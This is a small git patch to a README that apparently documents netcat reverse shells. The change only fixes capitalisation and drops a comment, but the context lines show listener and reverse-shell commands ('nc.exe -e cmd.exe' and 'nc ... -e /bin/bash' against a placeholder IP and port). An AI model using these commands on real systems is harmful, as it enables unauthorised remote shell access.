From 32127f844a2f4cc3e482debb1800cf922ed84c46 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Wed, 3 Aug 2022 19:14:49 -0400 Subject: [PATCH] Update README.md --- README.md | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 1ed6d11..6f86582 100644 --- a/README.md +++ b/README.md @@ -418,12 +418,10 @@ sudo nc –lnvp {PORT} ```
-# {IP ADDRESS}: IP Address of the client from step one (python server) - ## NC Execute - Server [STEP 2] ```bash -# With Netcat installed +# With netcat installed # Usage - Windows nc.exe -e cmd.exe {IP ADDRESS} {PORT} @@ -433,7 +431,7 @@ nc {IP ADDRESS} {PORT} –e /bin/bash # =========================================== -# Without Netcat installed +# Without netcat installed # Usage - transfer payload via file transfer and execute binary